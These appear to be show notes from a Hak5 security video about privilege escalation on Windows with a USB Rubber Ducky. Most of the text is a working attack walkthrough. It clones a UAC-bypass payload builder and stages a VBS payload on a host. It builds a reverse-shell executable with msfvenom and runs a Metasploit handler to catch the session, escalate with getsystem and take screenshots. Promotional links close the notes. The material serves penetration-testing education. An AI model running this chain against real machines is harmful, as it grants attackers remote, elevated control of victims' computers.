Escalating Privileges in Windows & Staged Reverse Shells - Hak5 2117

Hak5

Escalating Privileges in Windows & Staged Reverse Shells - Hak5 2117

Privilege escalation on Windows, Meterpreter Reverse Shells and Staged Payloads with the USB Rubber Ducky!

Privilege escalation on Windows, Meterpreter Reverse Shells and Staged Payloads with the USB Rubber Ducky. All that and more, this time on Hak5.

 

Check out patreon.com/threatwire for our Patreon-only Audio RSS feed of Threat Wire!


git clone github.com/SkiddieTech/UAC-D-E-Rubber-Ducky

cd UAC-D-E-Rubber-Ducky

python uac-duck.py


Upload UAC-Duck-Payload.vbs to your host

Create the inject.bin payload file from our DuckyScript.txt using ducktoolkit.com and load it on the MicroSD card for the USB Rubber Ducky


We'll be using msfvenom to generate an executable reverse shell. Mubix has covered this in greater detail on Metasploit Minute - so check those episodes out.


msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.230.133 LPORT=4444 -f exe -o bob.exe


Next we'll upload it to the online host we specified in the python builder script


msfconsole

use exploit/multi/handler

set LHOST 192.168.230.133

set LPORT 4444

set ExitOnSession false

exploit -j


sessions

sessions -i 1

shell

whoami

exit

getsystem

shell

whoami

exit

screenshot


github.com/SkiddieTech/UAC-D-E-Rubber-Ducky


Enter our December giveaway! Details here: hakshop.com/pages/watchdogs2_giveaway


Shannon's going to CES! Gonna have a meetup during the trade show in Vegas: facebook.com/TekThing/photos/a.314494088749101.1073741828.304982593033584/598542447010929/?type=3&theater


We will be at Shmoocon!